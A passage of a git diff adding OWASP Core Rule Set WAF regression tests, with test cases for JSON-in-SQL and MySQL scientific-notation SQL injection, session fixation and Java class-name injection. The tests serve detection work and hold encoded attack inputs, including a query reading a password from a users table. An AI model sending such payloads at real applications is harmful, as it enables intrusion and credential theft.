+ - test_title: 942550-31
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"name":"asd"}' ?& array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-32
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"name":"asd"}' ?& array['a','name']
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22name%22%3A%22asd%22%7D%27%20%3F%26%20array%5B%27a%27%2C%27name%27%5D"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-33
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '[1,2,3]'::json ->> 2='3'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-34
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '[1,2,3]'::json ->> 2='3'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%5B1%2C2%2C3%5D%27%3A%3Ajson%20-%3E%3E%202%3D%273%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-35
+ desc: |
+ JSON in SQL (ARGS)
+ decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/"
+ data: "id=OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
+ - test_title: 942550-36
+ desc: |
+ JSON in SQL (REQUEST_FILENAME)
+ decoded payload: OR '{"a":1}'::jsonb #> '{a,b}' ? 'c'
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/OR%20%27%7B%22a%22%3A1%7D%27%3A%3Ajsonb%20%23%3E%20%27%7Ba%2Cb%7D%27%20%3F%20%27c%27"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942550"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
new file mode 100644
index 00000000..36b25154
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-942-APPLICATION-ATTACK-SQLI/942560.yaml
@@ -0,0 +1,41 @@
+---
+meta:
+ author: "Xhoenix"
+ description: MySQL Scientific Notation bypass payloads Detection
+ enabled: true
+ name: 942560.yaml
+tests:
+ - test_title: 942560-1
+ desc: "Positive test for Scientific Notation in MySQL, e.g 1.e("
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/"
+ data: "email=1.e(ascii+1.e(substring(1.e(select+password+from+users+limit+1+1.e,1+1.e)+1.e,1+1.e,1+1.e)1.e)1.e)+=+70+or'1'='2"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942560"
+ - test_title: 942560-2
+ desc: "Status Page Test - simplified positive test for Scientific Notation in MySQL, e.g 1.e("
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: POST
+ port: 80
+ uri: "/post"
+ data: "foo=1.e(ascii)"
+ version: HTTP/1.0
+ output:
+ log_contains: id "942560"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
new file mode 100644
index 00000000..0fda2219
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943100.yaml
@@ -0,0 +1,49 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943100.yaml
+tests:
+ - test_title: 943100-1
+ desc: Session Fixation Attack (943100) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /foo.php?bar=blah
+ version: HTTP/1.1
+ output:
+ log_contains: id "943100"
+ - test_title: 943100-2
+ desc: "Status Page Test - Possible Session Fixation Attack: Part of Setting Cookie Values in ARG"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /foo.php?test=.cookie;expires=
+ version: HTTP/1.1
+ output:
+ log_contains: id "943100"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
new file mode 100644
index 00000000..b1c2f603
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943110.yaml
@@ -0,0 +1,85 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943110.yaml
+tests:
+ - test_title: 943110-1
+ desc: Session Fixation Attack (943110) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ Referer: http://www.attackersite.com/test
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-2
+ desc: "session fixation attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Referer: "https://localhost.attackersite.com/"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-3
+ desc: "session fixation attack"
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Host: localhost
+ Referer: "https://attackersite.com/"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ method: GET
+ port: 80
+ uri: "/?phpsessid=asdfdasfadsads"
+ version: HTTP/1.0
+ output:
+ log_contains: id "943110"
+ - test_title: 943110-4
+ desc: Session Fixation Attack (943110) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Content-Type: application/x-www-form-urlencoded
+ Host: localhost
+ Referer: http://localhost/test
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ no_log_contains: id "943110"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
new file mode 100644
index 00000000..71cf166d
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-943-APPLICATION-ATTACK-SESSION-FIXATION/943120.yaml
@@ -0,0 +1,27 @@
+---
+meta:
+ author: csanders-git
+ description: None
+ enabled: true
+ name: 943120.yaml
+tests:
+ - test_title: 943120-1
+ desc: Session Fixation Attack (943120) from old modsec regressions
+ stages:
+ - stage:
+ input:
+ dest_addr: 127.0.0.1
+ headers:
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip, deflate
+ Accept-Language: zh-sg
+ Host: localhost
+ Keep-Alive: '300'
+ Proxy-Connection: keep-alive
+ User-Agent: "OWASP CRS test agent"
+ method: GET
+ port: 80
+ uri: /login.php?jsessionid=74B0CB414BD77D17B5680A6386EF1666
+ version: HTTP/1.1
+ output:
+ log_contains: id "943120"
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
new file mode 100644
index 00000000..64075646
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944000.yaml
@@ -0,0 +1,26 @@
+---
+meta:
+ author: "spartantri"
+ enabled: true
+ name: "944000.yaml"
+ description: "Description"
+tests:
+ - test_title: 944000-1
+ desc: Using text/plain Content-Type which do not have any bodyprocessor associated
+ stages:
+ - stage:
+ input:
+ dest_addr: "127.0.0.1"
+ port: 80
+ headers:
+ Host: "localhost"
+ User-Agent: "OWASP CRS test agent"
+ Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
+ Accept-Encoding: gzip,deflate
+ Accept-Language: en-us,en;q=0.5
+ Content-Type: "text/plain"
+ method: POST
+ version: HTTP/1.0
+ data: "test=value"
+ output:
+ no_log_contains: "id \"944000\""
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
new file mode 100644
index 00000000..8e008971
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944100.yaml
@@ -0,0 +1,355 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944100.yaml" + description: "Description" +tests: + - test_title: 944100-1 + desc: Argument test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-2 + desc: Argument test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" + - test_title: 944100-3 + desc: Argument name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-4 + desc: Argument name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: 
text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder=test" + output: + log_contains: "id \"944100\"" + - test_title: 944100-5 + desc: Cookie test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-6 + desc: Cookie test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-7 + desc: Cookie name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 
944100-8 + desc: Cookie name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.lang.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-9 + desc: Request header test includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-10 + desc: Request header test includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.lang.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-11 + desc: XML element includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + 
Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-12 + desc: XML attribute name includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-13 + desc: XML attribute value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-14 + desc: XML element value includes keywords java.lang.Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.Runtime" + output: + log_contains: "id \"944100\"" + - test_title: 944100-15 + desc: XML element includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + 
User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-16 + desc: XML attribute name includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944100\"" + - test_title: 944100-17 + desc: XML attribute value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + log_contains: "id \"944100\"" + - test_title: 944100-18 + desc: XML element value includes keywords java.lang.ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "java.lang.ProcessBuilder" + output: + log_contains: "id \"944100\"" 
diff --git a/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
new file mode 100644
index 00000000..c7cc1360
--- /dev/null
+++ b/nginx/config/owasp-crs/tests/regression/tests/REQUEST-944-APPLICATION-ATTACK-JAVA/944110.yaml
@@ -0,0 +1,355 @@ +--- +meta: + author: "spartantri" + enabled: true + name: "944110.yaml" + description: "Description" +tests: + - test_title: 944110-1 + desc: Argument test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/x-www-form-urlencoded" + method: POST + version: HTTP/1.0 + data: "test=java.Runtime" + output: + log_contains: "id \"944110\"" + - test_title: 944110-2 + desc: Argument test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "test=java.ProcessBuilder" + output: + log_contains: "id \"944110\"" + - test_title: 944110-3 + desc: Argument name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.Runtime=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-4 + desc: Argument name includes keywords java. 
and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + method: POST + version: HTTP/1.0 + data: "java.ProcessBuilder=test" + output: + log_contains: "id \"944110\"" + - test_title: 944110-5 + desc: Cookie test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-6 + desc: Cookie test includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: test=java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-7 + desc: Cookie name includes keywords java. 
and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.Runtime=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-8 + desc: Cookie name includes keywords java. and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + Cookie: java.ProcessBuilder=test + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-9 + desc: Request header test includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.Runtime + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-10 + desc: Request header test includes keywords java. 
and ProcessBuilder + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "text/plain" + test: java.ProcessBuilder + method: POST + version: HTTP/1.0 + data: "test=value" + output: + log_contains: "id \"944110\"" + - test_title: 944110-11 + desc: XML element includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-12 + desc: XML attribute name includes keywords java. and Runtime + stages: + - stage: + input: + dest_addr: "127.0.0.1" + port: 80 + headers: + Host: "localhost" + User-Agent: "OWASP CRS test agent" + Accept: text/xml,application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5 + Accept-Encoding: gzip,deflate + Accept-Language: en-us,en;q=0.5 + Content-Type: "application/xml" + method: POST + version: HTTP/1.0 + data: "element_value" + output: + no_log_contains: "id \"944110\"" + - test_title: 944110-13 + desc: XML attribute value includes keywords java. 
